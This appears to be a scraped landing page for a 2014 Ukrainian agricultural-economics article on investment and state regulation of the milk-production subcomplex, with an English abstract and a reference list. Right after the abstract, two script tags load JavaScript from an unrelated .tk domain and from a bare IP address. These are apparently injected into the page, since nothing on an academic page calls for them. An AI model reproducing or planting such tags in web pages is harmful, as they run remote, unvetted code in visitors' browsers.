ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 338.432
Фінансові відносини та бухгалтерський облік

Investment reference points for formation of systems of government control of development of the milk-production subcomplex / Slatvinska L.A. // Ekonomika APK. - 2014. - № 3 - P. 50

The role of food safety is defined within the evolution of modern civilization. The importance of milk as a nutrition component is studied. The article studies the role of milk-production subcomplex in realization of the state food security objective i.e. 1,4 times increase of the milk production in Ukraine by 2015. It defines the influence of investments on the development of production subsystem of milk-production subcomplex and inter-disciplinary specifics of investing process, caused by changes in spheres of science, innovations, information technologies and standards. The objective necessity of accelerated comprehensive improvement of government control of milk-production subcomplex is substantiated on the basis of its investment orientation and taking into account operating requirements of territorial and branch policy of the state as well as high level of standards. Figs.: 3. Refs.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: investment, system, government control, food safety, agriculture, subcomplex of milk, standards

References

 1. Declaration of the World Summit on Food Security – FAO.org (Rome, 2009) [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/Docs/Final_Declaration/K6050_Rev10__WSFS_OEWG__ru.pdf.
 2. Technology [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/WSFS _Issues_papers/Issues_papers_RU/WSFS_tech_R_LR.pdf.
 3. Milk and dairy products in human nutrition / Food and agriculture organization of the United Nation. – Rome, 2013. – 404 p.
 4. The state of food and agriculture: food systems for better nutrition / Food and agriculture organization of the United Nation. – Rome, 2013. – 114 p.
 5. Investment [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/WSFS_ Issues_papers/Issues_papers_RU/WSFS_investment_R_LR.pdf.
 6. Про прийняття Статуту Продовольчої та сільськогосподарської організації Організації Об'єднаних Націй. Закон України № 1334 від 25 листопада 2003 р. // Відом. Верхов. Ради України (ВВР). – 2004. – № 15. – Ст. 211.
 7. Глобалізація і продовольство: моногр. / П.Т. Саблук, О.Г. Білорус, В.І. Власов. – К.: ННЦ ІАЕ, 2008. – 632 с.
 8. Ільчук М.М. Ефективне функціонування молокопродуктового підкомплексу України / М. М. Ільчук. – К.: Нічлава, 2004. – 312 с.
 9. Мостенська Т. Л. Системне забезпечення конкурентоспроможності підприємств м’ясної і молочної промисловості України : моногр. / Т.Л. Мостенська, О.І. Драган, І.В. Суха // Нац. ун-т харч. технологій. – К. : [б. в.], 2010. – 268 с.
 10. Калинчик Н.В. Оптимизация размеров сельскохозяйственных предприятий по производству молока и говядины: моногр. / Н.В. Калинчик, А.А. Петрыченко. – К.: ННЦ ИАЭ, 2011. – 208 с.
 11. Козак О.А. Формування та розвиток ринку молока та молочної продукції в регіоні (на матеріалах Вінницької області) [текст] : автореф. дис... канд. екон. наук: 08.07.02 / О.А. Козак. – К., 2006. – 22 с.
 12. Мудрак Р.П. Формування ринку молока та молокопродуктів у Черкаській області [текст] : автореф. дис... канд. екон. наук: 08.07.02 / Р.П. Мудрак. – Миколаїв, 2002. – 20 с.
 13. Одінцов М. М. Організаційно-економічний механізм формування і розвитку ринку продуктів тваринництва [текст] : автореф. дис... докт. екон. наук: 08.00.03 / М. М. Одінцов. – К., 2010. – 38 с.
 14. Кісіль М.І. Стратегічні напрями інвестиційного забезпечення розвитку сільського господарства / М.І. Кісіль // Економіка АПК. – 2012. – № 9. – С. 36-39.
 15. Кісіль М.І. Інвестиційний проект створення сучасної молочної ферми на 300 корів / М.І. Кісіль, М.М. Кропивко, І.Г. Карпенко; за ред. М.І. Кісіля. – К.: ННЦ ІАЕ, 2012. – 52 с.
 16. Стратегічні напрями реформування управління комплексним розвитком агропромислового виробництва і сільських територій: наук. вид / М.Ф. Кропивко, М.Й. Малік та ін. ; за ред. М.Ф.Кропивка. – К.: ННЦ ІАЕ, 2012. – 82 с.
 17. Підвищення конкурентоспроможності та соціальної спрямованості агропромислового виробництва на основі розвитку кластерних систем: наук. вид. / М.Ф. Кропивко, Ю.О. Лупенко, М.Й. Малік та ін.; за ред. М.Ф. Кропивка. – К.: ННЦ ІАЕ, 2013. – 46 с.
 18. Корецький М.Х. Формування та розвиток системи державного регулювання аграрного сектора економіки [текст]: автореф. дис. ... докт. наук з держ. управління : 25.00.02 / М. Х. Корецький. – К., 2003. – 38 с.
 19. Могильний О.М. Організаційно-економічний механізм державного регулювання аграрного виробництва у трансформаційний період [текст]: автореф. дис... докт. екон. наук: 08.07.02 / О. М. Могильний. – К., 2003. – 40 с.
 20. Діброва А.Д. Державне регулювання сільськогосподарського виробництва [текст] : автореф. дис. … докт. екон. наук: 08.00.03 / А. Д. Діброва. – К., 2008. – 40 с.
Read article: 14_03_50-54.pdf
Read translation: 1403slatvinska.pdf